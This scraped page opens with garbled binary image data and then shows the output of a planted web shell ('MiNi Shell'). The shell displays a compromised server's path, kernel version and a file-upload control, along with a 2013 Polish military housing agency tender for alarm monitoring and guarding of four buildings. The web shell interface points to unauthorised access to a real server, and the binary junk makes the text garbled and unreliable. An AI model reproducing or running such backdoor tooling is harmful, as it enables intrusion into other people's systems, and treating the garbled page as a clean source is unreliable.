JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130122/30852-N-2013.html

<p class="kh_header"><b>Kraków: Ochrona obiektów OReg WAM Kraków</b><br>
<b>Numer ogłoszenia: 30852 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowa Agencja Mieszkaniowa Oddział Regionalny w Krakowie , ul. Montelupich 3, 31-155 Kraków, woj. małopolskie, tel. 12 4552140, 4552149, 4557402, faks 12 4554323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektów OReg WAM Kraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ochrona obiektów OReg WAM Kraków: Tarnowskie Góry, ul. Mickiewicza 27 (pustostan), Lubliniec, ul. ZHP 1 (pustostan), Katowice, ul. Kilińskiego 9 (częściowo użytkowany), Chorzów, ul. Śląska 7 (pustostan).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do niniejszego postępowania, o  których mowa w art. 67 ust. 1 pkt 6 ustawy, w wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie uznany za spełniony, gdy Wykonawca wykaże, że posiada koncesję wydaną przez MSWiA na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia w zakresie obejmującym przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z postępującą prywatyzacją, w przypadku zbycia lub przekazania nieruchomości objętej umową, Zamawiający w drodze jednostronnego oświadczenia woli złożonego Wykonawcy w formie pisemnej, ma prawo z tym dniem rozwiązać umowę. Powyższe nie stanowi podstawy do wnoszenia roszczeń przez Wykonawcę wobec Zamawiającego.
Zmiana podatku VAT w stosunku do wysokości podanej przez Wykonawcę w ofercie jest możliwa tylko w przypadku zmiany przepisów o podatku VAT, stosownie do tej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wam.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> pobrać ze strony www.wam.net.pl  Numer postępowania OKDO-DZP.7720.1.2013.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 11:00, miejsce: siedziba Zamawiającego: 30-901 Kraków ul. Montelupich 3, pokój nr 15 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tarnowskie Góry, ul. Mickiewicza 27 (pustostan):.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłączenie lokalnej instalacji alarmowej Zamawiającego do systemu monitorowania Wykonawcy. 
Po dokonaniu podłączenia Wykonawca świadczył będzie na rzecz Zamawiającego usługi polegające na:
umożliwieniu przesyłania sygnałów alarmowych do Centrali monitoringu Wykonawcy (poprzez zaprogramowanie urządzeń do transmisji) i odbieraniu meldunków alarmowych dotyczących: otwarć, zamknięć, usterek, włamań, napadów w obiekcie należącym do Zamawiającego objętym systemem sygnalizacji włamania i napadu,
podjęciu natychmiastowych (po przyjęciu meldunku alarmowego) działań interwencyjnych:
wysłanie w miejsce zdarzenia grupy interwencyjnej (w ramach ryczałtu uwzględnić trzykrotny wyjazd grupy interwencyjnej w okresie jednego miesiąca), która zabezpieczy obiekt, podejmie stosowne działania adekwatne do zagrożenia do czasu przybycia Policji; grupa interwencyjna nie będzie podejmowała działań o charakterze porządkowym w przypadku innych zdarzeń wynikających z działalności prowadzonej przez Wykonawcę. Określa się czas dojazdu grupy interwencyjnej do 15 minut od czasu otrzymania zgłoszenia alarmowego do stacji monitorowania,
sporządzenie notatki służbowej z wyjazdu grupy interwencyjnej zawierającej procedurę postępowania i przekazanie jej Zamawiającemu,
bezzwłoczne powiadamianie Zamawiającego - w przypadku stwierdzenia takiej potrzeby dodatkowo przekazanie informacji do najbliższej terytorialnie jednostki Policji lub Straży Pożarnej (w zależności od zdarzenia) oraz przesłanie w terminie do 7 dni oryginału notatki z przebiegu zdarzenia.
Utrzymywanie technicznej sprawności lokalnego systemu alarmowego poprzez przeprowadzanie jego konserwacji.
Monitorowanie obiektu odbywać się będzie 24 godziny na dobę przez 7 dni w tygodniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Lubliniec, ul. ZHP 1 (pustostan).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłączenie lokalnej instalacji alarmowej Zamawiającego do systemu monitorowania Wykonawcy. 
Po dokonaniu podłączenia Wykonawca świadczył będzie na rzecz Zamawiającego usługi polegające na:
umożliwieniu przesyłania sygnałów alarmowych do Centrali monitoringu Wykonawcy (poprzez zaprogramowanie urządzeń do transmisji) i odbieraniu meldunków alarmowych dotyczących: otwarć, zamknięć, usterek, włamań, napadów w obiekcie należącym do Zamawiającego objętym systemem sygnalizacji włamania i napadu,
podjęciu natychmiastowych (po przyjęciu meldunku alarmowego) działań interwencyjnych:
wysłanie w miejsce zdarzenia grupy interwencyjnej (w ramach ryczałtu uwzględnić trzykrotny wyjazd grupy interwencyjnej w okresie jednego miesiąca), która zabezpieczy obiekt, podejmie stosowne działania adekwatne do zagrożenia do czasu przybycia Policji; grupa interwencyjna nie będzie podejmowała działań o charakterze porządkowym w przypadku innych zdarzeń wynikających z działalności prowadzonej przez Wykonawcę. Określa się czas dojazdu grupy interwencyjnej do 15 minut od czasu otrzymania zgłoszenia alarmowego do stacji monitorowania,
sporządzenie notatki służbowej z wyjazdu grupy interwencyjnej zawierającej procedurę postępowania i przekazanie jej Zamawiającemu,
bezzwłoczne powiadamianie Zamawiającego - w przypadku stwierdzenia takiej potrzeby dodatkowo przekazanie informacji do najbliższej terytorialnie jednostki Policji lub Straży Pożarnej (w zależności od zdarzenia) oraz przesłanie w terminie do 7 dni oryginału notatki z przebiegu zdarzenia.
utrzymywaniu technicznej sprawności lokalnego systemu alarmowego poprzez przeprowadzanie jego konserwacji.
Monitorowanie obiektu odbywać się będzie 24 godziny na dobę przez 7 dni w tygodniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Katowice, ul. Kilińskiego 9 (częściowo użytkowany).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłączenie lokalnej instalacji alarmowej Zamawiającego do systemu monitorowania Wykonawcy. 
Po dokonaniu podłączenia Wykonawca świadczył będzie na rzecz Zamawiającego usługi polegające na:
umożliwieniu przesyłania sygnałów alarmowych do Centrali monitoringu Wykonawcy (poprzez zaprogramowanie urządzeń do transmisji) i odbieraniu meldunków alarmowych dotyczących: otwarć, zamknięć, usterek, włamań, napadów w obiekcie należącym do Zamawiającego objętym systemem sygnalizacji włamania i napadu,
podjęciu natychmiastowych (po przyjęciu meldunku alarmowego) działań interwencyjnych:
wysłanie w miejsce zdarzenia grupy interwencyjnej (w ramach ryczałtu uwzględnić trzykrotny wyjazd grupy interwencyjnej w okresie jednego miesiąca), która zabezpieczy obiekt, podejmie stosowne działania adekwatne do zagrożenia do czasu przybycia Policji; grupa interwencyjna nie będzie podejmowała działań o charakterze porządkowym w przypadku innych zdarzeń wynikających z działalności prowadzonej przez Wykonawcę. Określa się czas dojazdu grupy interwencyjnej do 15 minut od czasu otrzymania zgłoszenia alarmowego do stacji monitorowania,
sporządzenie notatki służbowej z wyjazdu grupy interwencyjnej zawierającej procedurę postępowania i przekazanie jej Zamawiającemu,
bezzwłoczne powiadamianie Zamawiającego - w przypadku stwierdzenia takiej potrzeby dodatkowo przekazanie informacji do najbliższej terytorialnie jednostki Policji lub Straży Pożarnej (w zależności od zdarzenia) oraz przesłanie w terminie do 7 dni oryginału notatki z przebiegu zdarzenia,
utrzymywaniu technicznej sprawności lokalnego systemu alarmowego poprzez przeprowadzanie jego konserwacji,
ochronie fizycznej obiektu codziennie w godzinach 7-9 oraz 17-19.
zamykaniu i otwieraniu wejścia głównego do budynku oraz bramy wjazdowej przy wejściu głównym.
obchodzie budynku wewnątrz i na zewnątrz po otwarciu i przed zamknięciem.
Monitorowanie obiektu odbywać się będzie 24 godziny na dobę przez 7 dni w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Chorzów, ul. Śląska 7 (pustostan).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłączenie lokalnej instalacji alarmowej Zamawiającego do systemu monitorowania Wykonawcy. 
Po dokonaniu podłączenia Wykonawca świadczył będzie na rzecz Zamawiającego usługi polegające na:
umożliwieniu przesyłania sygnałów alarmowych do Centrali monitoringu Wykonawcy (poprzez zaprogramowanie urządzeń do transmisji) i odbieraniu meldunków alarmowych dotyczących: otwarć, zamknięć, usterek, włamań, napadów w obiekcie należącym do Zamawiającego objętym systemem sygnalizacji włamania i napadu,
podjęciu natychmiastowych (po przyjęciu meldunku alarmowego) działań interwencyjnych:
wysłanie w miejsce zdarzenia grupy interwencyjnej (w ramach ryczałtu uwzględnić trzykrotny wyjazd grupy interwencyjnej w okresie jednego miesiąca), która zabezpieczy obiekt, podejmie stosowne działania adekwatne do zagrożenia do czasu przybycia Policji; grupa interwencyjna nie będzie podejmowała działań o charakterze porządkowym w przypadku innych zdarzeń wynikających z działalności prowadzonej przez Wykonawcę. Określa się czas dojazdu grupy interwencyjnej do 15 minut od czasu otrzymania zgłoszenia alarmowego do stacji monitorowania,
sporządzenie notatki służbowej z wyjazdu grupy interwencyjnej zawierającej procedurę postępowania i przekazanie jej Zamawiającemu,
bezzwłoczne powiadamianie Zamawiającego - w przypadku stwierdzenia takiej potrzeby dodatkowo przekazanie informacji do najbliższej terytorialnie jednostki Policji lub Straży Pożarnej (w zależności od zdarzenia) oraz przesłanie w terminie do 7 dni oryginału notatki z przebiegu zdarzenia,
utrzymywaniu technicznej sprawności lokalnego systemu alarmowego poprzez przeprowadzanie jego konserwacji.
Monitorowanie obiektu odbywać się będzie 24 godziny na dobę przez 7 dni w tygodniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com